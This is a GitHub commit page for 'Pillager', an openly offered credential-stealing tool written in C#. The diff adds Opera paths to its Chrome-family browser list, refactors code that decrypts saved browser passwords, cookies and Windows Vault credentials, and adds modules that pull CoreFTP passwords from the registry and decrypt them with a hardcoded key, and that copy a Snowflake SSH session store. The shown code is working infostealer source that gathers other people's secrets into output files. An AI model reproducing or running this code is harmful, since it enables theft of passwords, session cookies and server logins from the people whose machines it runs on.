Skip to content

Commit

Permalink
v1.0
Browse files Browse the repository at this point in the history
  • Loading branch information
@qwqdanchun
qwqdanchun committed Feb 9, 2024
1 parent f370916 commit 4527887
Show file tree
Hide file tree
Showing 58 changed files with 2,444 additions and 2,048 deletions.
58 changes: 29 additions & 29 deletions Pillager/Browsers/Chrome.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,6 @@
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.Remoting.Messaging;
using System.Security.Cryptography;
using System.Text;
using Pillager.Helper;
Expand All @@ -21,28 +20,30 @@ public static class Chrome

public static Dictionary<string, string> browserOnChromium = new Dictionary<string, string>
{
{ "Chrome", "Google\\Chrome\\User Data" } ,
{ "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
{ "Chromium", "Chromium\\User Data" } ,
{ "Chrome SxS", "Google\\Chrome SxS\\User Data" },
{ "Edge", "Microsoft\\Edge\\User Data" } ,
{ "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
{ "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
{ "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
{ "360ChromeX", "360ChromeX\\Chrome\\User Data" } ,
{ "360Chrome", "360Chrome\\Chrome\\User Data" } ,
{ "Vivaldi", "Vivaldi\\User Data" } ,
{ "CocCoc", "CocCoc\\Browser\\User Data" },
{ "Torch", "Torch\\User Data" },
{ "Kometa", "Kometa\\User Data" },
{ "Orbitum", "Orbitum\\User Data" },
{ "CentBrowser", "CentBrowser\\User Data" },
{ "7Star", "7Star\\7Star\\User Data" },
{ "Sputnik", "Sputnik\\Sputnik\\User Data" },
{ "Epic Privacy Browser", "Epic Privacy Browser\\User Data" },
{ "Uran", "uCozMedia\\Uran\\User Data" },
{ "Yandex", "Yandex\\YandexBrowser\\User Data" },
{ "Iridium", "Iridium\\User Data" },
{ "Chrome", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Google\\Chrome\\User Data" )} ,
{ "Chrome Beta",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google\\Chrome Beta\\User Data" )},
{ "Chromium", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Chromium\\User Data" )} ,
{ "Chrome SxS", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Google\\Chrome SxS\\User Data" )},
{ "Edge", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Microsoft\\Edge\\User Data") } ,
{ "Brave-Browser", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"BraveSoftware\\Brave-Browser\\User Data") } ,
{ "QQBrowser",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Tencent\\QQBrowser\\User Data") } ,
{ "SogouExplorer", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Sogou\\SogouExplorer\\User Data") } ,
{ "360ChromeX", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"360ChromeX\\Chrome\\User Data" )} ,
{ "360Chrome",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "360Chrome\\Chrome\\User Data") } ,
{ "Vivaldi",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Vivaldi\\User Data") } ,
{ "CocCoc", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"CocCoc\\Browser\\User Data" )},
{ "Torch", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Torch\\User Data" )},
{ "Kometa", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Kometa\\User Data" )},
{ "Orbitum", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Orbitum\\User Data" )},
{ "CentBrowser",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "CentBrowser\\User Data" )},
{ "7Star", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"7Star\\7Star\\User Data" )},
{ "Sputnik", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Sputnik\\Sputnik\\User Data" )},
{ "Epic Privacy Browser", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Epic Privacy Browser\\User Data" )},
{ "Uran",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "uCozMedia\\Uran\\User Data" )},
{ "Yandex", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Yandex\\YandexBrowser\\User Data" )},
{ "Iridium", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),"Iridium\\User Data" )},
{ "Opera", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"Opera Software\\Opera Stable" )},
{ "Opera GX", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"Opera Software\\Opera GX Stable" )},
};


Expand Down Expand Up @@ -119,7 +120,7 @@ public static string Chrome_passwords()
string username = handler.GetValue(i, "username_value");
string crypt = handler.GetValue(i, "password_value");
string password = Encoding.UTF8.GetString(DecryptData(Convert.FromBase64String(crypt)));
if (url != null && url != "" && username != null && username != "" && !(password is null) && password.Length > 0)
if (!string.IsNullOrEmpty(url) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
{
passwords.Append("\t[URL] -> {" + url + "}\n\t[USERNAME] -> {" + username + "}\n\t[PASSWORD] -> {" + password + "}\n");
passwords.AppendLine();
Expand Down Expand Up @@ -156,7 +157,7 @@ public static string Chrome_history()
}
catch { }
}
return history.ToString(); ;
return history.ToString();
}

public static string Chrome_cookies()
Expand All @@ -166,7 +167,7 @@ public static string Chrome_cookies()
{
string chrome_cookie_path = Path.Combine(BrowserPath, profile + "\\Cookies");
string chrome_100plus_cookie_path = Path.Combine(BrowserPath, profile + "\\Network\\Cookies");
if (!File.Exists(chrome_cookie_path) == true)
if (!File.Exists(chrome_cookie_path))
chrome_cookie_path = chrome_100plus_cookie_path;
if (!File.Exists(chrome_cookie_path))
continue;
Expand Down Expand Up @@ -196,9 +197,8 @@ public static string Chrome_cookies()
string name = handler.GetValue(i, "name");
string crypt = handler.GetValue(i, "encrypted_value");
string path = handler.GetValue(i, "path");
long expDate;
double expDateDouble = 0;
long.TryParse(handler.GetValue(i, "expires_utc"), out expDate);
long.TryParse(handler.GetValue(i, "expires_utc"), out var expDate);
if ((expDate / 1000000.000000000000) - 11644473600 > 0)
expDateDouble = (expDate / 1000000.000000000000000) - 11644473600;
string cookie = Encoding.UTF8.GetString(DecryptData(Convert.FromBase64String(crypt)));
Expand Down Expand Up @@ -279,7 +279,7 @@ public static void Save(string path)
{
try
{
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), browser.Value);
string chromepath = browser.Value;
BrowserName = browser.Key;
BrowserPath = chromepath;
MasterKey = GetMasterKey();
Expand Down
2 changes: 1 addition & 1 deletion Pillager/Browsers/FireFox.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -248,7 +248,7 @@ public static Login[] ParseLoginItems(string loginJSON)
string[] keyValuePairs = bracketContent.Split(',');
foreach (string keyValueStr in keyValuePairs)
{
string[] keyValue = keyValueStr.Split(new Char[] { ':' }, 2);
string[] keyValue = keyValueStr.Split(new[] { ':' }, 2);
string key = keyValue[0];
string val = keyValue[1];
if (val == "null")
Expand Down
35 changes: 13 additions & 22 deletions Pillager/Browsers/IE.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -25,8 +25,7 @@ public static string IE_passwords()
{
if (IntPtr.Size == 4)
{
bool is64Bit;
IsWow64Process(GetCurrentProcess(), out is64Bit);
IsWow64Process(GetCurrentProcess(), out var is64Bit);
if (is64Bit)
{
return "Don't support recovery IE password from wow64 process";
Expand All @@ -41,18 +40,18 @@ public static string IE_passwords()

if (OSMajor >= 6 && OSMinor >= 2)
{
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8);
VAULT_ITEM = typeof(Native.VAULT_ITEM_WIN8);
}
else
{
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7);
VAULT_ITEM = typeof(Native.VAULT_ITEM_WIN7);
}

/* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */
object GetVaultElementValue(IntPtr vaultElementPtr)
{
object results;
object partialElement = Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT));
object partialElement = Marshal.PtrToStructure(vaultElementPtr, typeof(Native.VAULT_ITEM_ELEMENT));
FieldInfo partialElementInfo = partialElement.GetType().GetField("Type");
var partialElementType = partialElementInfo.GetValue(partialElement);

Expand Down Expand Up @@ -102,9 +101,9 @@ object GetVaultElementValue(IntPtr vaultElementPtr)

Int32 vaultCount = 0;
IntPtr vaultGuidPtr = IntPtr.Zero;
var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr);
var result = Native.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr);

if ((int)result != 0)
if (result != 0)
{
throw new Exception("[ERROR] Unable to enumerate vaults. Error (0x" + result.ToString() + ")");
}
Expand Down Expand Up @@ -132,15 +131,8 @@ object GetVaultElementValue(IntPtr vaultElementPtr)
guidAddress = (IntPtr)(guidAddress.ToInt64() + Marshal.SizeOf(typeof(Guid)));
IntPtr vaultHandle = IntPtr.Zero;
string vaultType;
if (vaultSchema.ContainsKey(vaultGuid))
{
vaultType = vaultSchema[vaultGuid];
}
else
{
vaultType = vaultGuid.ToString();
}
result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle);
vaultType = vaultSchema.ContainsKey(vaultGuid) ? vaultSchema[vaultGuid] : vaultGuid.ToString();
result = Native.VaultOpenVault(ref vaultGuid, 0, ref vaultHandle);
if (result != 0)
{
throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString());
Expand All @@ -150,7 +142,7 @@ object GetVaultElementValue(IntPtr vaultElementPtr)
// Fetch all items within Vault
int vaultItemCount = 0;
IntPtr vaultItemPtr = IntPtr.Zero;
result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr);
result = Native.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr);
if (result != 0)
{
throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString());
Expand All @@ -176,18 +168,17 @@ object GetVaultElementValue(IntPtr vaultElementPtr)
FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified");
UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem);

object[] vaultGetItemArgs;
IntPtr pPackageSid = IntPtr.Zero;
if (OSMajor >= 6 && OSMinor >= 2)
{
// Newer versions have package sid
FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid");
pPackageSid = (IntPtr)pPackageSidInfo.GetValue(currentItem);
result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem);
result = Native.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem);
}
else
{
result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem);
result = Native.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem);
}

if (result != 0)
Expand All @@ -200,7 +191,7 @@ object GetVaultElementValue(IntPtr vaultElementPtr)
// Fetch the credential from the authenticator element
object cred = GetVaultElementValue(pAuthenticatorElement);
object packageSid = null;
if (pPackageSid != IntPtr.Zero && pPackageSid != null)
if (pPackageSid != IntPtr.Zero)
{
packageSid = GetVaultElementValue(pPackageSid);
}
Expand Down Expand Up @@ -266,7 +257,7 @@ public static string IE_books()

foreach (string url_file_path in files)
{
if (File.Exists(url_file_path) == true)
if (File.Exists(url_file_path))
{
string booktext = File.ReadAllText(url_file_path);
Match match = Regex.Match(booktext, @"URL=(.*?)\n");
Expand Down
105 changes: 105 additions & 0 deletions Pillager/FTP/CoreFTP.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,105 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Runtime.Remoting.Channels;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;

namespace Pillager.FTP
{
internal class CoreFTP
{
public static string FTPName = "CoreFTP";

public static string GetInfo()
{
StringBuilder sb = new StringBuilder();
string rkPath = "Software\\FTPWare\\CoreFTP\\Sites";
using (RegistryKey rk = Registry.CurrentUser.OpenSubKey(rkPath, false))
{
if (rk != null)
{
foreach (string text in rk.GetSubKeyNames())
{
using (RegistryKey rkSession = Registry.CurrentUser.OpenSubKey(Path.Combine(rkPath, text), false))
{
object value = rkSession.GetValue("Host");
object value2 = rkSession.GetValue("Port");
object value3 = rkSession.GetValue("User");
object value4 = rkSession.GetValue("PW");
if (value != null && value3 != null && value4 != null)
{
sb.AppendLine("Server:"+ string.Format("{0}:{1}", value.ToString(), value2.ToString()));
sb.AppendLine(value3.ToString());
sb.AppendLine(Decrypt(value4.ToString(), "hdfzpysvpzimorhk"));
sb.AppendLine();
}
}
}
}
}
return sb.ToString();
}

private static string Decrypt(string encryptedData, string key)
{
byte[] array = Encoding.UTF8.GetBytes(key);
PadToMultipleOf(ref array, 8);
byte[] array2 = ConvertHexStringToByteArray(encryptedData);
string text;
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.KeySize = array.Length * 8;
rijndaelManaged.Key = array;
rijndaelManaged.Mode = CipherMode.ECB;
rijndaelManaged.Padding = PaddingMode.None;
using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor())
{
byte[] array3 = cryptoTransform.TransformFinalBlock(array2, 0, array2.Length);
text = Encoding.UTF8.GetString(array3);
}
}
return text;
}

private static void PadToMultipleOf(ref byte[] src, int pad)
{
int num = (src.Length + pad - 1) / pad * pad;
Array.Resize(ref src, num);
}

private static byte[] ConvertHexStringToByteArray(string hexString)
{
if (hexString.Length % 2 != 0)
{
throw new ArgumentException(string.Format(CultureInfo.InvariantCulture, "The binary key cannot have an odd number of digits: {0}", hexString));
}
byte[] array = new byte[hexString.Length / 2];
for (int i = 0; i < array.Length; i++)
{
string text = hexString.Substring(i * 2, 2);
array[i] = byte.Parse(text, NumberStyles.HexNumber, CultureInfo.InvariantCulture);
}
return array;
}

public static void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, FTPName);
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, FTPName + ".txt"), output);
}
}
catch { }
}
}
}
3 changes: 0 additions & 3 deletions Pillager/FTP/FileZilla.cs
View file
Original file line number Diff line number Diff line change
@@ -1,8 +1,5 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;

namespace Pillager.FTP
{
Expand Down
29 changes: 29 additions & 0 deletions Pillager/FTP/Snowflake.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;

namespace Pillager.FTP
{
internal class Snowflake
{
public static string FTPName = "Snowflake";

public static void Save(string path)
{
try
{
string jsonpath = Path.Combine(Environment.GetEnvironmentVariable("USERPROFILE"), "snowflake-ssh\\session-store.json");
if (File.Exists(jsonpath))
{
string savepath = Path.Combine(path, FTPName);
Directory.CreateDirectory(savepath);
File.Copy(jsonpath, Path.Combine(savepath, "session-store.json"));
}
}
catch { }
}
}
}
Loading

0 comments on commit 4527887

Please sign in to comment.